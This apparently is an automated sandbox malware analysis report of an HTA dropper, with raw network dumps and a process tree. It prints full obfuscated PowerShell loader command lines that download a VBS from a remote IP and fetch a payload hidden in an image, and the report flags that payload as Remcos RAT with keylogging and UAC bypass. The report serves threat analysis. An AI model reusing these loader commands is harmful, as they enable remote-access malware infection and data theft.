                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                              2024-10-14 09:36:08 UTC1378INData Raw: 77 24 91 80 f7 ed aa 38 13 c5 74 2e 92 f9 a4 19 c0 50 c1 95 13 cc f4 aa d7 4f e2 f4 f6 cf 9a 34 12 6a 34 d1 ac 34 c0 35 95 3d b3 e9 ff 00 b5 df 0d 9e 5f 16 d1 c2 37 3c 8c ae 62 55 46 b2 4b 70 2d 85 9e 48 cf 03 04 29 1a 02 c8 cb 27 e1 22 e8 8f 87 f3 c0 63 45 08 87 48 b1 94 0b b9 a8 91 99 9a b8 22 87 5d 10 0c cd 1b b7 a8 92 00 02 e8 d6 6a e9 8a 5b 07 65 52 c0 a8 46 37 fa 62 5a 9d 3c 47 59 18 29 b4 1d c3 d2 47 3f 4c 09 9f 4f a7 74 d3 90 78 2c c0 37 bf 3c 73 8a 10 92 a8 46 da b2 2c 8a a8 77 71 9b 83 4e 8f 0a 82 ab ed c1 ac ce 7f 04 8d 35 22 50 e5 08 6b aa b1 81 68 b5 2c ec eb e5 80 55 14 32 31 a5 53 75 63 e7 97 d6 cd 1e a2 6d 36 91 ee de 4f 55 76 14 79 07 0b 2b 22 ef 72 88 c0 2f a9 8a 8e 6b 31 f4 8c da ed 7c d2 10 5c 85 3b 2c d5 0a 23 a6 06 b8 8b 6f 90 b0 bc
                                                              Data Ascii: w$8t.PO4j445=_7<bUFKp-H)'"cEH"]j[eRF7bZ<GY)G?LOtx,7<sF,wqN5"Pkh,U21Sucm6OUvy+"r/k1|\;,#o
                                                              2024-10-14 09:36:08 UTC1378INData Raw: 8c cd 80 06 22 88 00 fb 74 c5 c6 89 f4 fe 2d 26 ab ef 2f e5 b0 1e 8a 15 d3 03 7b ef a3 82 6d 4f 7c 20 f1 02 0b 6d 76 25 85 73 99 62 5f 34 d8 1c 7b e1 83 10 a3 8a b3 d7 01 8d 66 a0 49 0c 6a 5b 68 dc c7 75 e1 74 7a 92 cc 1f 71 de be 96 e6 f7 0f 7c c8 f1 3d 3b 6a 61 8e 38 e5 68 88 53 ea 51 cd e4 69 8b 69 b6 02 ec e5 68 59 ea 78 eb 81 ea 25 9c b2 90 2b 69 19 91 39 68 a6 8e 4d 96 a1 83 30 63 c6 30 9a 85 d8 ac 59 55 5b 81 67 92 71 2f 14 95 e6 85 a2 86 89 65 2a 6b b5 e0 6a 45 e2 ed 26 a4 45 1f aa 31 d4 a9 e0 1f 6c cd 97 c4 4b c9 2b 9e 77 31 20 fd 71 4d 32 2f 84 e8 00 6d cc e7 80 7b 9f 8e 27 14 ca fc 0f c3 cf 24 60 3a 67 91 e4 34 0b 1a be b9 07 54 77 8b e0 11 ef df 04 93 a2 2b 51 f5 1e 2b e1 99 7a 9d 2e ac 78 92 ce 35 2d f7 72 2b cb a1 5f 3c 0d 4d 46 b0 24 43 7b
                                                              Data Ascii: "t-&/{mO| mv%sb_4{fIj[hutzq|=;ja8hSQiihYx%+i9hM0c0YU[gq/e*kjE&E1lK+w1 qM2/m{'$`:g4Tw+Q+z.x5-r+_<MF$C{
                                                              2024-10-14 09:36:08 UTC1378INData Raw: 66 6d 4b f8 66 a7 61 05 96 26 b5 23 f1 70 73 f3 be ae 35 fb ac f2 15 01 99 ef 9e a3 9e d9 f5 ef 18 fb 5d a0 0b 26 92 09 a3 77 64 65 26 fe 07 fe bf ae 7c 9f 57 2c 6f e1 f2 21 70 ae ac 0d 7b e0 62 6c 20 6e 07 80 31 dd 33 bb 44 39 b3 7c 83 8a 79 8d b8 86 e0 1e 31 9d 15 14 65 07 a6 03 88 18 2d 95 5e 72 e2 32 ca 6d 45 1c ac a8 16 35 3b e8 8c a9 d4 24 41 44 8e 59 8f 4e 0e 01 3c b5 58 f6 8b 5a 3c 57 4c 80 be e2 fe 63 38 92 e0 90 f4 3a d6 5c be c4 0e ce 02 81 f9 e0 42 26 e0 56 94 1f 6c 23 82 aa 2d 54 0d c4 8f 8e 29 06 b5 25 76 51 e8 3d af be 32 1d 5c 6d 2c 09 1d f0 0f 13 72 3a 7d 71 b5 72 07 52 7e 03 33 d0 d6 da 3c f7 c6 44 6b d2 46 56 37 55 7d 0e 01 0c 8f 24 8a 63 ba f6 03 bf b6 3a 74 d3 3c 51 3c 60 33 49 b7 d3 e9 0c 2f a1 da 1b 77 36 39 34 39 1e f9 5d 14 f0 e9
                                                              Data Ascii: fmKfa&#ps5]&wde&|W,o!p{bl n13D9|y1e-^r2mE5;$ADYN<XZ<WLc8:\B&Vl#-T)%vQ=2\m,r:}qrR~3<DkFV7U}$c:t<Q<`3I/w6949]
                                                              2024-10-14 09:36:08 UTC1378INData Raw: 02 f2 41 e0 62 ed a9 02 44 70 8a c0 0b 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db e3 95 f2 8b 03 5c 0e f8 0b 30 55 21 42 96 63 d1 47 7c 22 e8 dc 95 79 9d ae ec 20 6e 07 cf 0e a8 ab ca a5 03 d0 e5 e2 47 67 a2 2e b0 07 20 26 43 e9 ed c7 1f d7 2a 51 c2 9b 5e b8 47 23 71 04 51 ca 16 24 71 80 22 18 70 16 b2 e8 8c 48 39 60 bc d0 be 7a d6 6a 78 57 86 2e b9 a5 56 b5 0a bf 89 7a 86 c0 48 0f 49 17 47 2b b5 98 10 1b 93 c0 cf 56 3c 0f 47 c3 04 90 81 41 bd 46 c9 ae bc 63 71 e8 74 b1 a8 03 4d 18 ae fb 45 fe 67 03 c2 18 66 d3 b5 14 60 4f 3e ae f9 74 0c ec 41 5c f7 6f a7
                                                              Data Ascii: AbDpfcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
                                                              2024-10-14 09:36:08 UTC1378INData Raw: f1 15 94 48 14 8d b6 ca df a7 03 e9 f1 cc df b0 9a 89 a3 d3 7d a7 48 0c aa 4f 84 33 7a 05 9a 12 c4 39 ae db 49 07 e1 78 6f b5 a3 56 df b4 cd 42 6a db 6c ad a8 85 db 71 e8 19 51 81 f8 0a 38 1e fb ed 9c ba 65 d2 cd f6 82 49 4c da 88 d8 68 f4 fb a3 2c b1 f9 91 ee 2f 67 f1 10 a1 80 1d 8b 03 db 3e 6f a5 7d 2b 49 12 ef 8d 83 7e 0e 3a 8a 24 9e 9c 1f 7f 9e 7b 5f da 44 2f a0 f0 ff 00 0d 48 24 46 1a ad 05 36 c4 5a 71 4a 40 aa e7 9a e7 3e 65 f7 7d 42 08 d6 35 7a f2 dd 94 dd 6d 62 bd 30 35 27 d2 46 65 8a 40 54 aa 93 60 8b fd 30 5e 46 98 ea 15 46 9d 41 55 2d c8 a1 f9 74 c4 92 09 9f 4c c3 d4 a4 44 a1 94 25 7a 87 23 a9 e4 f1 97 58 35 0d 34 6e c8 f4 ec 25 2c 79 da 45 d0 fc ab 03 61 20 d3 6d dd b1 16 bd 94 56 56 5d 3e 92 65 37 1a 5d 75 0b 99 9a 6d 43 a4 c1 0e 9a c9 dc 4b
                                                              Data Ascii: H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:${_D/H$F6ZqJ@>e}B5zmb05'Fe@T`0^FFAU-tLD%z#X54n%,yEa mVV]>e7]umCK
                                                              2024-10-14 09:36:08 UTC1378INData Raw: 0f 38 48 fe dc e9 54 9b 82 4d fd 58 12 28 e7 cf e7 79 21 87 cc 2e ca e0 72 a8 2f 13 89 e4 d5 5b c6 ee 48 fc 4a c2 b0 3d e6 a7 ed f6 98 ea 3f 79 a6 90 83 de c0 c9 3f 6c 74 82 88 d3 b8 53 ec dc e7 cf a5 47 2d be 6b bb a0 06 3f 04 cd 0a 82 f0 2c 8a dc 0d d8 1e b9 be da e9 18 d7 95 29 3d bd 57 94 7f b7 3a 54 50 7e eb 2b 3d 55 93 9e 6a 2d 56 9b 54 ac 53 49 12 95 34 48 26 ef 17 95 d7 cc 56 11 2f c4 73 c6 07 a8 9b ed f6 8a 14 2c 74 ce 1a ba 6e ac cb f0 9f b5 be 11 e1 d3 4b 20 4d 43 bc c7 73 6e 6b 0a 7d 80 ac cd 30 69 b5 3e 96 d2 a3 12 3f 10 ea 33 16 5f 04 d4 0d 63 46 8b 69 d4 37 41 81 bf e3 9f 6c e5 d4 f8 a4 53 78 74 af 0c 51 0d db 4d 90 cd ec 46 7a 78 be de e8 bc a5 59 f4 ec d2 6c 05 88 60 05 9f 60 73 c1 41 e0 b1 23 7e f8 b3 f1 cf 6a 39 a9 f7 7d 24 6a 0b a0 07
                                                              Data Ascii: 8HTMX(y!.r/[HJ=?y?ltSG-k?,)=W:TP~+=Uj-VTSI4H&V/s,tnK MCsnk}0i>?3_cFi7AlSxtQMFzxYl``sA#~j9}$j
                                                              2024-10-14 09:36:08 UTC1378INData Raw: 93 c3 b9 dc ee 49 76 31 34 6a b8 dc 05 11 d7 8b bc 70 f8 b6 92 49 de 46 2e 1e 55 62 e4 a2 90 58 83 c9 1d f8 24 59 b3 de f3 0e 69 7c cd a2 ec 2a 95 51 55 42 c9 fa f5 38 17 95 15 a4 31 a2 aa b2 83 6b 1d 91 c5 d9 b2 7d b2 da 77 31 22 d4 65 b7 b1 50 7d c8 af ee 30 63 51 21 05 4b 02 0d d9 2a 09 e7 ad 1a b1 91 1c 92 aa 00 ad 41 4e e0 3d 8f 1f db 01 89 35 3b c0 20 15 db de f0 6f a9 56 75 76 dc 48 ed bb 8c 08 5b 4a 17 7d f9 ca 88 49 e2 f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7
                                                              Data Ascii: Iv14jpIF.UbX$Yi|*QUB81k}w1"eP}0cQ!K*AN=5; oVuvH[J}I#k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*
                                                              2024-10-14 09:36:08 UTC1378INData Raw: 55 78 17 d8 df cf 2b 2c 4e 80 47 2a b5 05 dd 83 d3 29 55 65 55 65 1b 88 c0 d0 66 49 22 dc ae c1 81 be 17 8e 98 b8 77 8c 15 90 2d 6e ea 32 88 5e 32 40 1b ab 2a 25 32 69 64 0c c3 75 1f cc 74 c0 b4 00 44 43 48 3d 24 9e be d9 57 87 73 82 09 b3 d6 b1 53 aa 77 34 e4 5d 03 47 e5 93 f7 c4 14 49 da 40 2a 7e 3f 96 07 ad 79 e3 61 bd 4e d0 7b e4 95 8a 45 b0 c5 8f c3 02 ba 33 cb 53 00 3b 9c 80 42 b1 3b b9 f9 60 18 ce aa 42 b2 86 1d 2c 76 f9 e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a
                                                              Data Ascii: Ux+,NG*)UeUefI"w-n2^2@*%2idutDCH=$WsSw4]GI@*~?yaN{E3S;B;`B,v@p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{
                                                              2024-10-14 09:36:08 UTC1378INData Raw: 20 86 62 6f b7 53 95 e9 c1 c0 bc 8f be be 19 5d c4 8a ed 90 7e 1d 32 39 c0 90 48 37 9c 4d 9c e1 d7 9e 99 6a 5f 2e ef d5 7d 3e 18 10 8a 5d c2 8e a7 8c 69 34 c5 24 56 24 30 0d 46 b1 55 b1 ea 1d 46 31 16 a9 92 68 d9 85 aa 90 6b 01 c1 a3 1f 78 16 c0 03 ea 1c d1 c0 ea a1 47 d4 b2 c6 e2 c0 b3 63 fa e0 66 d4 34 f3 16 51 42 c9 03 28 ac 03 31 65 dc 4f 7f 6c 06 e7 83 7e 99 69 cb 32 f7 6e ff 00 2c 5a 39 4a c0 e9 cd 9e 38 cd 24 4f 37 40 10 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4
                                                              Data Ascii: boS]~29H7Mj_.}>]i4$V$0FUF1hkxGcf4QB(1eOl~i2n,Z9J8$O7@Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:05:35:55
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:mshta.exe "C:\Users\user\Desktop\na.hta"
                                                              Imagebase:0x230000
                                                              File size:13'312 bytes
                                                              MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:1
                                                              Start time:05:35:55
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                                                              Imagebase:0x480000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:05:35:55
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:05:35:56
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                                                              Imagebase:0x480000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:05:35:59
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
                                                              Imagebase:0x710000
                                                              File size:2'141'552 bytes
                                                              MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:05:35:59
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"
                                                              Imagebase:0x950000
                                                              File size:46'832 bytes
                                                              MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:05:36:04
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                                                              Imagebase:0xfd0000
                                                              File size:147'456 bytes
                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:05:36:04
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                              Imagebase:0x480000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:05:36:04
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:false

                                                              General

                                                              Target ID:9
                                                              Start time:05:36:05
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                                                              Imagebase:0x480000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:05:36:13
                                                              Start date:14/10/2024
                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                              Imagebase:0xc60000
                                                              File size:65'440 bytes
                                                              MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
